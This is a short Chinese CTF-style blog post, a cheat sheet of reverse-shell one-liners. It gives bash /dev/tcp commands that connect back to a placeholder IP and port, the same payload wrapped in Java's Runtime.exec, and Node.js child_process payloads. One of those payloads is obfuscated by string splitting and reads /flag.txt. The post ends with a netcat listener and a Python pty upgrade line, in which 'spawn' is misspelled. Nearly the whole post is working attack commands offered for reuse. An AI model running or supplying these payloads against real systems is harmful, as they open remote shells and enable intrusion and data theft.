Akiba's blog Akiba's blog
首页
  • web

    • PHP
    • Python
    • JavaScript
  • misc

    • 隐写
  • 比赛
  • 网站
  • 资源
  • 分类
  • 标签
  • 归档
关于

Kagami

萌新 Web 手,菜鸡一个
首页
  • web

    • PHP
    • Python
    • JavaScript
  • misc

    • 隐写
  • 比赛
  • 网站
  • 资源
  • 分类
  • 标签
  • 归档
关于
  • Web

    • 各种弹shell
      • bash
      • java
      • javascript
      • 接收
    • XML外部实体注入从入门到入土
    • PHP

    • JavaScript

    • Python

    • sql注入

  • Misc

  • JavaScript文章

  • Vue文章

  • 代码审计

  • 知识库
  • Web
Kagami
2021-06-09

各种弹shell

# bash

/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/port 0>&1
1

# java

java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/port 0>&1')
1

# javascript

process.mainModule.require('child_process').exec('')
global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx.xx.xxx.xxx/7777 0>&1\"')
eval("glob"+"al.proce"+"ss.mainMo"+"dule.re"+"quire('child_'+'pro'+'cess')['ex'+'ecSync']('cat /flag.txt').toString()")
1
2
3

# 接收

nc -ltvp port
1
python3 -c 'import pty;pty.spwan("/bin/sh")'
1
上次更新: 2021/08/02, 11:26:39
XML外部实体注入从入门到入土

XML外部实体注入从入门到入土→

Theme by Vdoing | Copyright © 2020-2021 秋葉
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式